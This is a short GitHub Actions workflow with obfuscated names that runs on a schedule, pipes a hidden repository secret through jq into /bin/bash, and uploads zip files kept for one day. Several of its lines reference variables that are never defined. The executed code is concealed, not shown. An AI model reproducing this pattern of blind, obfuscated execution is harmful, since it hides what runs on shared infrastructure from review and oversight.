name: caiheijilong
on:
  workflow_dispatch:

  schedule:
    - cron: '19 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caiheijilong
        env:
          b611: ${{ secrets.b611 }}
        run: |
          printf '%s' "$b611" | jq -r .xbr12289 | /bin/bash
          printf '%s' "$vhoie2" | jq -r .o5 | /bin/bash
          printf '%s' "$a077" | jq -r .axqvl98 | /bin/bash
          printf '%s' "$hecvr027" | jq -r .en32 | /bin/bash
          printf '%s' "$um47211" | jq -r .nyvvf83401 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: DyREwDZA
          path: "*.zip"
          retention-days: 1
